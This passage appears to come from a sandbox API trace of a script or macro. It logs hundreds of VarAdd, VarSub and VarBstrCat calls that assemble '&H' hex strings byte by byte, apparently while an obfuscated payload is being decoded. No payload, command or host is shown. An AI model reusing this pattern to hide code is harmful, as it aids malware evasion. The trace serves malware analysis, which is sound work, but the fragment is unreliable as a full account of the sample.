pvarResult=0x197a24) returned 0x0 [0112.765] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.765] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.765] VarBstrCat (in: bstrLeft="&H9", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.765] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.765] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.765] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.765] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.765] VarBstrCat (in: bstrLeft="&He", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.765] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.766] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.766] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.766] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.766] VarBstrCat (in: bstrLeft="&H2", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.766] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.766] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.766] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.766] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.766] VarBstrCat (in: bstrLeft="&H7", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.766] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.766] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.766] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.766] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.766] VarBstrCat (in: bstrLeft="&H0", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.766] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.767] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.767] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.767] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.767] VarBstrCat (in: bstrLeft="&Ha", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.767] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.767] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.767] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.767] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.767] VarBstrCat (in: bstrLeft="&Hc", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.767] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.767] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.767] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.767] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.767] VarBstrCat (in: bstrLeft="&H4", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.767] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.768] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.768] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.768] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.768] VarBstrCat (in: bstrLeft="&Ha", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.768] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.768] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.768] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.768] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.768] VarBstrCat (in: bstrLeft="&H8", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.769] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.769] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.769] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.769] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.769] VarBstrCat (in: bstrLeft="&H9", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.769] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.769] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.769] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.769] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.769] VarBstrCat (in: bstrLeft="&Hd", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.769] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.769] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.769] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.769] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.769] VarBstrCat (in: bstrLeft="&Hd", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.769] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.769] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.769] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.770] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.770] VarBstrCat (in: bstrLeft="&Hf", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.770] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.770] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.770] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.770] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.770] VarBstrCat (in: bstrLeft="&H2", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.770] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.770] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.770] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.770] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.770] VarBstrCat (in: bstrLeft="&H8", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.770] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.770] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.770] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.771] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.771] VarBstrCat (in: bstrLeft="&Hf", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.771] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.771] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.771] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.771] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.771] VarBstrCat (in: bstrLeft="&Hf", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.771] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.771] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.771] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.771] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.771] VarBstrCat (in: bstrLeft="&H2", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.771] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.771] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.771] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.772] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.772] VarBstrCat (in: bstrLeft="&Hd", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.772] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.772] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.772] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.772] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.772] VarBstrCat (in: bstrLeft="&H3", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.772] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.772] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.772] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.772] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.772] VarBstrCat (in: bstrLeft="&H8", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.772] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.772] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.773] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.773] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.773] VarBstrCat (in: bstrLeft="&He", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.773] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.773] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.773] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.773] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.773] VarBstrCat (in: bstrLeft="&Hb", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.773] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.773] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.773] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.773] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.773] VarBstrCat (in: bstrLeft="&H5", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.773] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.773] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.773] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.773] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.774] VarBstrCat (in: bstrLeft="&H9", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.774] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.774] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.774] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.774] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.774] VarBstrCat (in: bstrLeft="&H6", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.774] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.774] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.774] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.774] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.774] VarBstrCat (in: bstrLeft="&H6", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.774] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.774] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.774] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.774] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.774] VarBstrCat (in: bstrLeft="&H7", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.774] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.774] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.775] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.775] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.775] VarBstrCat (in: bstrLeft="&H5", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.775] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.775] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.775] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.775] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.775] VarBstrCat (in: bstrLeft="&H9", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.775] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.775] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.775] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.775] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.775] VarBstrCat (in: bstrLeft="&H5", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.775] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.775] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.775] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.775] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.775] VarBstrCat (in: bstrLeft="&Hd", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.775] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.776] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.776] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.776] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.776] VarBstrCat (in: bstrLeft="&H6", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.776] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.776] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.776] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.776] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.776] VarBstrCat (in: bstrLeft="&H9", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.776] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.776] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.776] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.776] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.776] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.776] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.776] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.776] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.777] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, 